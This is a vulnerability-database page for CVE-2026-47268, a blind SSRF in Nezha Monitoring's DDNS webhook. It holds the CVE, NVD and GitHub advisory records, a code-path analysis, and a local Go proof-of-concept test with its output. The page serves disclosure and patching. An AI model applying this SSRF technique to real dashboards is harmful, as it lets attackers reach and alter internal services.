Vulnerability-Lookup

CVE-2026-47268 (GCVE-0-2026-47268)

Vulnerability from cvelistv5 – Published: 2026-06-12 20:56 – Updated: 2026-06-12 20:56

Title

Nezha Monitoring: Authenticated DDNS webhook configuration allows blind SSRF from the dashboard host

Summary

Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10.

Severity

6.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/nezhahq/nezha/security/advisor…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
nezhahq	nezha	Affected: >= 0.20.0, < 2.0.10

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "nezha",
          "vendor": "nezhahq",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.20.0, \u003c 2.0.10"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O\u0026M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-12T20:56:45.935Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9"
        }
      ],
      "source": {
        "advisory": "GHSA-6x26-5727-rrm9",
        "discovery": "UNKNOWN"
      },
      "title": "Nezha Monitoring: Authenticated DDNS webhook configuration allows blind SSRF from the dashboard host"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-47268",
    "datePublished": "2026-06-12T20:56:45.935Z",
    "dateReserved": "2026-05-18T23:03:37.229Z",
    "dateUpdated": "2026-06-12T20:56:45.935Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-47268",
      "date": "2026-06-14",
      "epss": "0.00025",
      "percentile": "0.07529"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-47268\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-12T22:16:51.390\",\"lastModified\":\"2026-06-12T22:16:51.390\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O\u0026M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-47268

Vulnerability from fkie_nvd - Published: 2026-06-12 22:16 - Updated: 2026-06-12 22:16

Severity

6.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O\u0026M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10."
    }
  ],
  "id": "CVE-2026-47268",
  "lastModified": "2026-06-12T22:16:51.390",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-12T22:16:51.390",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-6X26-5727-RRM9

Vulnerability from github – Published: 2026-05-29 22:10 – Updated: 2026-05-29 22:10

Summary

Nezha's authenticated DDNS webhook configuration allows blind SSRF from the dashboard host

Details

Summary

An authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks.

This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive.

Details

The DDNS API is available to authenticated users, not only administrators:

cmd/dashboard/controller/controller.go:137 registers GET /api/v1/ddns.
cmd/dashboard/controller/controller.go:139 registers POST /api/v1/ddns.
cmd/dashboard/controller/controller.go:140 registers PATCH /api/v1/ddns/:id.

The create and update handlers copy attacker-controlled webhook fields directly from JSON request bodies into model.DDNSProfile:

cmd/dashboard/controller/ddns.go:47-74 accepts model.DDNSForm and stores WebhookURL, WebhookMethod, WebhookRequestType, WebhookRequestBody, and WebhookHeaders.
cmd/dashboard/controller/ddns.go:112-145 updates the same fields after profile ownership is checked.
model/ddns_api.go:11-15 exposes these fields as JSON input.
model/ddns.go:28-33 stores these fields on the persisted profile.

Users can attach owned DDNS profiles to owned servers, and DDNS updates are triggered in common server update and agent IP-reporting paths:

cmd/dashboard/controller/server.go:63-83 checks DDNS profile ownership, then stores EnableDDNS, DDNSProfiles, and OverrideDDNSDomains on an owned server.
service/singleton/server.go:44-58 calls UpdateDDNS when a server with DDNS enabled is updated.
service/rpc/nezha.go:247-279 calls UpdateDDNS when an authenticated agent reports a changed IP.

The DDNS provider dispatcher instantiates the webhook provider when Provider == "webhook":

service/singleton/ddns.go:58-95, especially service/singleton/ddns.go:79-81.

The sink is the DDNS webhook provider:

pkg/ddns/webhook/webhook.go:49-65 prepares and sends the HTTP request with utils.HttpClient.Do(req).
pkg/ddns/webhook/webhook.go:85-100 formats and applies attacker-controlled headers.
pkg/ddns/webhook/webhook.go:91-92 creates the request with the configured method and URL.
pkg/ddns/webhook/webhook.go:117-134 parses the configured URL and only formats query parameters; it does not restrict scheme, host, IP range, or redirects.
pkg/ddns/webhook/webhook.go:137-158 builds attacker-controlled request bodies for POST/PATCH/PUT.

The project already contains SSRF defenses for notification webhooks, showing the expected mitigation pattern is absent from the DDNS webhook path:

model/notification.go:34-58 defines blocked private/reserved CIDRs.
model/notification.go:193-221 creates a notification HTTP client that resolves and pins a validated IP and disables redirects.
model/notification.go:229-263 only allows http/https, requires a hostname, resolves all addresses, and rejects disallowed IPs.
model/notification.go:265-276 rejects blocked ranges and non-global-unicast targets.

Equivalent validation was not found in pkg/ddns/webhook/webhook.go.

Safe local PoC

Environment:

Repository: https://github.com/nezhahq/nezha.git
Commit tested: 05e5da2535197fc223b79601d50eeea362dcf853
Tag at commit: v2.0.9
Module: github.com/nezhahq/nezha
Go version: go1.26.3 linux/amd64
Testing scope: local-only; loopback HTTP listener and fake local UDP DNS SOA server only.

A temporary same-package test was created and removed automatically after execution. It used a local httptest listener as the internal service and a local UDP DNS server that returned an SOA for example.com.. The test then executed the normal DDNS update pipeline with a webhook DDNS profile pointing at the loopback HTTP listener.

Command run:

tmp="pkg/ddns/ddns_ssrf_local_poc_test.go"; trap 'rm -f "$tmp"' EXIT; cat > "$tmp" <<'EOF'
package ddns

import (
    "context"
    "io"
    "net"
    "net/http"
    "net/http/httptest"
    "testing"

    "github.com/miekg/dns"
    "github.com/nezhahq/nezha/model"
    "github.com/nezhahq/nezha/pkg/ddns/webhook"
)

func TestLocalPoCDDNSUpdatePipelineReachesLoopback(t *testing.T) {
    hit := make(chan string, 1)
    httpSrv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        body, _ := io.ReadAll(r.Body)
        hit <- r.Method + " " + r.URL.Path + " " + r.Header.Get("X-Proof") + " " + string(body)
        w.WriteHeader(http.StatusNoContent)
    }))
    defer httpSrv.Close()

    dnsPacketConn, err := net.ListenPacket("udp", "127.0.0.1:0")
    if err != nil {
        t.Fatal(err)
    }
    dnsSrv := &dns.Server{PacketConn: dnsPacketConn, Handler: dns.HandlerFunc(func(w dns.ResponseWriter, r *dns.Msg) {
        msg := new(dns.Msg)
        msg.SetReply(r)
        if len(r.Question) > 0 && r.Question[0].Qtype == dns.TypeSOA {
            msg.Answer = append(msg.Answer, &dns.SOA{
                Hdr:     dns.RR_Header{Name: "example.com.", Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 60},
                Ns:      "ns.example.com.",
                Mbox:    "hostmaster.example.com.",
                Serial:  1,
                Refresh: 60,
                Retry:   60,
                Expire:  60,
                Minttl:  60,
            })
        }
        _ = w.WriteMsg(msg)
    })}
    go func() { _ = dnsSrv.ActivateAndServe() }()
    defer dnsSrv.Shutdown()

    enableIPv4 := true
    enableIPv6 := false
    profile := &model.DDNSProfile{
        EnableIPv4:         &enableIPv4,
        EnableIPv6:         &enableIPv6,
        MaxRetries:         1,
        Domains:            []string{"host.example.com"},
        Provider:           model.ProviderWebHook,
        WebhookURL:         httpSrv.URL + "/internal",
        WebhookMethod:      2,
        WebhookRequestType: 1,
        WebhookRequestBody: `{"ip":"#ip#","domain":"#domain#","type":"#type#"}`,
        WebhookHeaders:     `{"X-Proof":"nezha-ddns-pipeline-ssrf"}`,
    }
    provider := &Provider{
        DDNSProfile: profile,
        IPAddrs:     &model.IP{IPv4Addr: "203.0.113.10"},
        Setter:      &webhook.Provider{DDNSProfile: profile},
    }

    ctx := context.WithValue(context.Background(), DNSServerKey{}, []string{dnsPacketConn.LocalAddr().String()})
    if err := provider.updateDomain(ctx, "host.example.com"); err != nil {
        t.Fatalf("updateDomain returned error: %v", err)
    }

    select {
    case got := <-hit:
        t.Logf("observed loopback request through DDNS update pipeline: %s", got)
    default:
        t.Fatalf("expected loopback listener to receive DDNS webhook request")
    }
}
EOF
go test ./pkg/ddns -run TestLocalPoCDDNSUpdatePipelineReachesLoopback -v

Observed output:

=== RUN   TestLocalPoCDDNSUpdatePipelineReachesLoopback
    ddns_ssrf_local_poc_test.go:76: observed loopback request through DDNS update pipeline: POST /internal nezha-ddns-pipeline-ssrf {"ip":"203.0.113.10","domain":"host.example.com","type":"ipv4"}
--- PASS: TestLocalPoCDDNSUpdatePipelineReachesLoopback (0.00s)
PASS
ok      github.com/nezhahq/nezha/pkg/ddns   0.009s

A lower-level provider-only confirmation was also run with go test ./pkg/ddns/webhook -run TestLocalPoCDDNSWebhookReachesLoopback -v and observed:

observed loopback request: POST /internal nezha-ddns-ssrf {"ip":"203.0.113.10","domain":"host.example.com","type":"ipv4"}

Cleanup:

Both temporary PoC test files were removed by shell trap.
find . -path './.git' -prune -o \( -name 'ssrf_local_poc_test.go' -o -name 'ddns_ssrf_local_poc_test.go' \) -print returned no files.

Impact

An authenticated dashboard user can cause the Nezha dashboard process to send arbitrary HTTP requests to services reachable from the dashboard host, including loopback and private network targets. The confirmed path allows attacker-controlled method, URL path/query, headers, and request body.

Potential impacts depend on deployment and reachable internal services, but include:

Blind probing of internal HTTP services from the dashboard network location.
Triggering state-changing internal endpoints that trust localhost or private network origins.
Reaching services not exposed to the attacker directly.
Interaction with cloud metadata or control-plane endpoints if reachable and not otherwise protected.

The response body is not returned to the attacker in the confirmed code path, so this should not be described as direct arbitrary internal file/secret read without an additional response-disclosure primitive.

Severity

6.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/nezhahq/nezha"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.20.0"
            },
            {
              "fixed": "2.0.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47268"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T22:10:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "#### Summary\n\nAn authenticated Nezha dashboard user can create or update a DDNS profile with provider `webhook` and configure an arbitrary `webhook_url`, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with `utils.HttpClient` without the SSRF protections used by notification webhooks.\n\nThis allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive.\n\n#### Details\n\nThe DDNS API is available to authenticated users, not only administrators:\n\n- `cmd/dashboard/controller/controller.go:137` registers `GET /api/v1/ddns`.\n- `cmd/dashboard/controller/controller.go:139` registers `POST /api/v1/ddns`.\n- `cmd/dashboard/controller/controller.go:140` registers `PATCH /api/v1/ddns/:id`.\n\nThe create and update handlers copy attacker-controlled webhook fields directly from JSON request bodies into `model.DDNSProfile`:\n\n- `cmd/dashboard/controller/ddns.go:47-74` accepts `model.DDNSForm` and stores `WebhookURL`, `WebhookMethod`, `WebhookRequestType`, `WebhookRequestBody`, and `WebhookHeaders`.\n- `cmd/dashboard/controller/ddns.go:112-145` updates the same fields after profile ownership is checked.\n- `model/ddns_api.go:11-15` exposes these fields as JSON input.\n- `model/ddns.go:28-33` stores these fields on the persisted profile.\n\nUsers can attach owned DDNS profiles to owned servers, and DDNS updates are triggered in common server update and agent IP-reporting paths:\n\n- `cmd/dashboard/controller/server.go:63-83` checks DDNS profile ownership, then stores `EnableDDNS`, `DDNSProfiles`, and `OverrideDDNSDomains` on an owned server.\n- `service/singleton/server.go:44-58` calls `UpdateDDNS` when a server with DDNS enabled is updated.\n- `service/rpc/nezha.go:247-279` calls `UpdateDDNS` when an authenticated agent reports a changed IP.\n\nThe DDNS provider dispatcher instantiates the webhook provider when `Provider == \"webhook\"`:\n\n- `service/singleton/ddns.go:58-95`, especially `service/singleton/ddns.go:79-81`.\n\nThe sink is the DDNS webhook provider:\n\n- `pkg/ddns/webhook/webhook.go:49-65` prepares and sends the HTTP request with `utils.HttpClient.Do(req)`.\n- `pkg/ddns/webhook/webhook.go:85-100` formats and applies attacker-controlled headers.\n- `pkg/ddns/webhook/webhook.go:91-92` creates the request with the configured method and URL.\n- `pkg/ddns/webhook/webhook.go:117-134` parses the configured URL and only formats query parameters; it does not restrict scheme, host, IP range, or redirects.\n- `pkg/ddns/webhook/webhook.go:137-158` builds attacker-controlled request bodies for POST/PATCH/PUT.\n\nThe project already contains SSRF defenses for notification webhooks, showing the expected mitigation pattern is absent from the DDNS webhook path:\n\n- `model/notification.go:34-58` defines blocked private/reserved CIDRs.\n- `model/notification.go:193-221` creates a notification HTTP client that resolves and pins a validated IP and disables redirects.\n- `model/notification.go:229-263` only allows `http`/`https`, requires a hostname, resolves all addresses, and rejects disallowed IPs.\n- `model/notification.go:265-276` rejects blocked ranges and non-global-unicast targets.\n\nEquivalent validation was not found in `pkg/ddns/webhook/webhook.go`.\n\n#### Safe local PoC\n\nEnvironment:\n\n- Repository: `https://github.com/nezhahq/nezha.git`\n- Commit tested: `05e5da2535197fc223b79601d50eeea362dcf853`\n- Tag at commit: `v2.0.9`\n- Module: `github.com/nezhahq/nezha`\n- Go version: `go1.26.3 linux/amd64`\n- Testing scope: local-only; loopback HTTP listener and fake local UDP DNS SOA server only.\n\nA temporary same-package test was created and removed automatically after execution. It used a local `httptest` listener as the internal service and a local UDP DNS server that returned an SOA for `example.com.`. The test then executed the normal DDNS update pipeline with a webhook DDNS profile pointing at the loopback HTTP listener.\n\nCommand run:\n\n```bash\ntmp=\"pkg/ddns/ddns_ssrf_local_poc_test.go\"; trap \u0027rm -f \"$tmp\"\u0027 EXIT; cat \u003e \"$tmp\" \u003c\u003c\u0027EOF\u0027\npackage ddns\n\nimport (\n    \"context\"\n    \"io\"\n    \"net\"\n    \"net/http\"\n    \"net/http/httptest\"\n    \"testing\"\n\n    \"github.com/miekg/dns\"\n    \"github.com/nezhahq/nezha/model\"\n    \"github.com/nezhahq/nezha/pkg/ddns/webhook\"\n)\n\nfunc TestLocalPoCDDNSUpdatePipelineReachesLoopback(t *testing.T) {\n    hit := make(chan string, 1)\n    httpSrv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n        body, _ := io.ReadAll(r.Body)\n        hit \u003c- r.Method + \" \" + r.URL.Path + \" \" + r.Header.Get(\"X-Proof\") + \" \" + string(body)\n        w.WriteHeader(http.StatusNoContent)\n    }))\n    defer httpSrv.Close()\n\n    dnsPacketConn, err := net.ListenPacket(\"udp\", \"127.0.0.1:0\")\n    if err != nil {\n        t.Fatal(err)\n    }\n    dnsSrv := \u0026dns.Server{PacketConn: dnsPacketConn, Handler: dns.HandlerFunc(func(w dns.ResponseWriter, r *dns.Msg) {\n        msg := new(dns.Msg)\n        msg.SetReply(r)\n        if len(r.Question) \u003e 0 \u0026\u0026 r.Question[0].Qtype == dns.TypeSOA {\n            msg.Answer = append(msg.Answer, \u0026dns.SOA{\n                Hdr:     dns.RR_Header{Name: \"example.com.\", Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 60},\n                Ns:      \"ns.example.com.\",\n                Mbox:    \"hostmaster.example.com.\",\n                Serial:  1,\n                Refresh: 60,\n                Retry:   60,\n                Expire:  60,\n                Minttl:  60,\n            })\n        }\n        _ = w.WriteMsg(msg)\n    })}\n    go func() { _ = dnsSrv.ActivateAndServe() }()\n    defer dnsSrv.Shutdown()\n\n    enableIPv4 := true\n    enableIPv6 := false\n    profile := \u0026model.DDNSProfile{\n        EnableIPv4:         \u0026enableIPv4,\n        EnableIPv6:         \u0026enableIPv6,\n        MaxRetries:         1,\n        Domains:            []string{\"host.example.com\"},\n        Provider:           model.ProviderWebHook,\n        WebhookURL:         httpSrv.URL + \"/internal\",\n        WebhookMethod:      2,\n        WebhookRequestType: 1,\n        WebhookRequestBody: `{\"ip\":\"#ip#\",\"domain\":\"#domain#\",\"type\":\"#type#\"}`,\n        WebhookHeaders:     `{\"X-Proof\":\"nezha-ddns-pipeline-ssrf\"}`,\n    }\n    provider := \u0026Provider{\n        DDNSProfile: profile,\n        IPAddrs:     \u0026model.IP{IPv4Addr: \"203.0.113.10\"},\n        Setter:      \u0026webhook.Provider{DDNSProfile: profile},\n    }\n\n    ctx := context.WithValue(context.Background(), DNSServerKey{}, []string{dnsPacketConn.LocalAddr().String()})\n    if err := provider.updateDomain(ctx, \"host.example.com\"); err != nil {\n        t.Fatalf(\"updateDomain returned error: %v\", err)\n    }\n\n    select {\n    case got := \u003c-hit:\n        t.Logf(\"observed loopback request through DDNS update pipeline: %s\", got)\n    default:\n        t.Fatalf(\"expected loopback listener to receive DDNS webhook request\")\n    }\n}\nEOF\ngo test ./pkg/ddns -run TestLocalPoCDDNSUpdatePipelineReachesLoopback -v\n```\n\nObserved output:\n\n```text\n=== RUN   TestLocalPoCDDNSUpdatePipelineReachesLoopback\n    ddns_ssrf_local_poc_test.go:76: observed loopback request through DDNS update pipeline: POST /internal nezha-ddns-pipeline-ssrf {\"ip\":\"203.0.113.10\",\"domain\":\"host.example.com\",\"type\":\"ipv4\"}\n--- PASS: TestLocalPoCDDNSUpdatePipelineReachesLoopback (0.00s)\nPASS\nok  \tgithub.com/nezhahq/nezha/pkg/ddns\t0.009s\n```\n\nA lower-level provider-only confirmation was also run with `go test ./pkg/ddns/webhook -run TestLocalPoCDDNSWebhookReachesLoopback -v` and observed:\n\n```text\nobserved loopback request: POST /internal nezha-ddns-ssrf {\"ip\":\"203.0.113.10\",\"domain\":\"host.example.com\",\"type\":\"ipv4\"}\n```\n\nCleanup:\n\n- Both temporary PoC test files were removed by shell `trap`.\n- `find . -path \u0027./.git\u0027 -prune -o \\( -name \u0027ssrf_local_poc_test.go\u0027 -o -name \u0027ddns_ssrf_local_poc_test.go\u0027 \\) -print` returned no files.\n\n#### Impact\n\nAn authenticated dashboard user can cause the Nezha dashboard process to send arbitrary HTTP requests to services reachable from the dashboard host, including loopback and private network targets. The confirmed path allows attacker-controlled method, URL path/query, headers, and request body.\n\nPotential impacts depend on deployment and reachable internal services, but include:\n\n- Blind probing of internal HTTP services from the dashboard network location.\n- Triggering state-changing internal endpoints that trust localhost or private network origins.\n- Reaching services not exposed to the attacker directly.\n- Interaction with cloud metadata or control-plane endpoints if reachable and not otherwise protected.\n\nThe response body is not returned to the attacker in the confirmed code path, so this should not be described as direct arbitrary internal file/secret read without an additional response-disclosure primitive.",
  "id": "GHSA-6x26-5727-rrm9",
  "modified": "2026-05-29T22:10:13Z",
  "published": "2026-05-29T22:10:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nezhahq/nezha/security/advisories/GHSA-6x26-5727-rrm9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nezhahq/nezha"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Nezha\u0027s authenticated DDNS webhook configuration allows blind SSRF from the dashboard host"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-47268 (GCVE-0-2026-47268)

FKIE_CVE-2026-47268

GHSA-6X26-5727-RRM9

Summary

Details

Safe local PoC

Impact

Tags

Sightings

Nomenclature